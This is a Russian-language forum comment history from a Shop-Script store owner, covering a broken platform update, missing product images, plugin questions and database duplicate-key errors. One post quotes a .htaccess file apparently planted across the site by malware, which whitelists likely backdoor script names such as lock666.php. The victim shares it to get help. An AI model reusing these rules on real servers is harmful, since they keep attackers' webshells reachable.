Julia G. +6

Julia G.

• Julia G. Julia G. 18 февраля 2022 02:00 #

это прям теория заговора, что нашли другие wp сайты их взломали чтоб поднасрать именно этому сайту, именно в день обновления, чтоб подумали на косячное обновление :) с разницей в несколько часов однако. htaccess этот появился 15.02 в 11.07 а обновление было в этот же день в 19.16  запросила резервную копию с хостинга буду видимо в ручную удалять этот файл и каждой папки ибо он есть в каждой, просто каждейшей. 

Вопрос по теме если можно, тк мне все равно придется открывать каждую папку,  в /products можно ли удалить пустые папки как я уже сказала их там многое множество ( 99 в /products  и в них еще много подпапок ) и большинство пустые ( кроме этого гребанного htaccess ... )

в ответ на После обновленияв фронтенде магазина из карточек товара исчезли ВСЕ картинки

• Julia G. Julia G. 18 февраля 2022 01:18 #

уже погуглила  и да похоже, и это как то совпало с обновлением. в один день. И конечно я подумала на обновление. Пока не могу понять как такое возможно... 

в ответ на После обновленияв фронтенде магазина из карточек товара исчезли ВСЕ картинки

• Julia G. Julia G. 18 февраля 2022 01:15 #

если бы.... доступа к файловой системе ни у кого нет кроме меня. у работников только админка магазина для добавления товара и установки обновлений. на хостинге несколько сайтов и есть сайты на WP но  их htaccess  файлы не менялись с момента их рождения и абсолютно другие внутри.  а здесь... погуглила действительно похоже на вирус. как сказано выше и этот файл есть во всех директориях этого сайта ( не этого хостинга  только этого сайта ) за не имением лучшей идеи просто пойду сравню как выглядели директории этого сайта до 15 февраля и как выглядел  htaccess 

• Julia G. Julia G. 18 февраля 2022 00:44 #

да именно там я и ищу просто переписала  уже на нервах не так wa-data/protected/shop/products там очень много директорий и в них поддиректорий и очень много пустых,  как среди них найти то где чтото есть ?! консоль  открыла выдает 403

у всех директорий 755 у htaccess 444 у thumb.php 644

просто поймите,  до обновления был рабочий магазин все было  норм уже не первый год, и тут разом все ахнуло.  ок спецпредложения обновили работаем дальше,  и тут клиенты говорят нет картинок... ШОК. 

вот еще 15 февраля все htaccess  в одно время были изменены  на  вот такое, мы это не меняли тк в этом ничего не шарим но заметила по дате изменения это в день обновления произошло и оно сильно отличается от  htaccess_old 

<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>

• Julia G. Julia G. 18 февраля 2022 00:12 #

не понимаю о каком премиуме может идти речь, когда ПРО весь кривой косой, и ведь он тоже не бесплатный!  Такое ощущение что просто очень денег нужно поднять. доверие падает абсолютно.  

обновление последнее просто убило, магазин вышел из строя на непонятное количество дней, разве это ПРО ? вот так вот  вывалить то, что сломает работу магазина ?

сделайте про таким чтоб люди восхищались и  лучше этого сделайте премиум.... 

в ответ на Shop-Script премиум

• Julia G. Julia G. 17 февраля 2022 23:48 #

самое главное что мы не можем клиентам так говорить  пробуйте в других браузерах отключите автозаполнение...это не вариант совсем.  Клиент пришел потыкался, умаялся и ушел без покупки.

в ответ на Плагин Boxberry

• Julia G. Julia G. 17 февраля 2022 23:27 #

спасибо вам за быстрое реагирование! просто в шоке с такого "обновления"

в ответ на После обновления в Инсталлер, перестали работать оба сайта.

• Julia G. Julia G. 17 февраля 2022 23:26 #

у нас так же все белое было.  да спецпредложения. НО вот так выкатывать обновление, которое одним кликом похерит работы многих сайтов это просто ужасно.  Кроме всего, после обновления  не отображаются фото товара.  их просто нет во фронтэнде больше. В бекенде есть !  у нас посредине акции по сути сайт вышел из строя и так уже несколько дней... без варианта легкого восстановления

в ответ на После обновления в Инсталлер, перестали работать оба сайта.

• Julia G. Julia G. 7 октября 2021 23:01 #

я пробовала это сделать но ничего не сработало, НО первое это  костыль, не каждый пользователь полезет в такое  и второе уж с 2013 то года можно было уже добавить эту совершенно легкую опцию в основные настройки чтоб не приходилось искать костылей, 

в ответ на Фото категории !

• Julia G. Julia G. 9 сентября 2021 12:40 #

прошло 2 года а лучшего решения чем у вас так и нет.. а как сделать так чтобы показывало  имя и 1 букву фамилии?

в ответ на Как в отзывах отобразить ИМЯ автора без указания Фамилии и Отчества?

• Julia G. Julia G. 24 марта 2018 13:56 #

Добрый день а вот эта доработка от производителя плагина оплаты через сбербанк вы заказывали отдельно? где можно на нее глянуть. Сама ищу такой вариант, если уже есть решение было бы здорово!

в ответ на Ссылка на оплату картой в SMS сообщении в один клик

• Julia G. Julia G. 24 марта 2018 00:02 #

да и я тоже увидела и поняла что это не плохое решение вот хочу узнать реально ли его получить и на WA

в ответ на Добавление кнопки для оплаты офлайн заказа к плгину «Сбербанк» в Shop-Script

• Julia G. Julia G. 23 марта 2018 16:58 #

вот и мой вопрос про это же

https://support.webasyst.ru/25570/dobavlenie-knopki-dlya-oplaty-oflayn-zakaza-k-plginu-sberbank-v-shop-script/

хотелось бы просто иметь возможность направить клиента на то где он тупо вобьет минимум данных и оплатит. если вы разобрались в этом и имеете решение подскажите как а если нет сделайте плюсик и в моей теме

в ответ на Ссылка на оплату картой в SMS сообщении в один клик

• Julia G. Julia G. 28 апреля 2016 02:56 #

однако жесть . просто я даже не всегда знаю у какого значения должно быть a_i включено например в shop_order_items .... и так каждый раз когда сталкиваюсь с ошибкой иду и гадаю куда ж поставить a_i и ведь тоже случилось после переезда на другой хостинг....

вот еще одна вылезла

<h2 id="Title" style="margin-bottom: 0.3em; font-size: 1.35em; font-family: 'Helvetica Neue', 'Liberation Sans', Arial, sans-serif; line-height: 1.2em; background-color: rgb(255, 255, 255);">Query Error
    Query: INSERT INTO shop_order_log
    (`order_id`, `action_id`, `before_state_id`, `after_state_id`, `datetime`, `contact_id`) VALUES (87, 'delete', 'new', 'deleted', '2016-04-28 09:57:33', 18811)
    Error: 1062</h2>

сума сойти все так руками искать... однозначно что попадись на такое покупатель уйдет в прострации... а я могу и не сразу найти какой то глюк...

в ответ на Message: Duplicate entry '0' for key 'PRIMARY'

• Julia G. Julia G. 27 апреля 2016 10:19 #

добрый день после переезда на другой хостинг очень много где появляется ошибка 1062

но я не сзнаю где именно должно стоять значение a_i вроде столкнусь с одним - исправлю потом еще чтото выходит , как можно узнать где ( все месте в бд ) должно стоять a_i&

в ответ на Message: Duplicate entry '0' for key 'PRIMARY'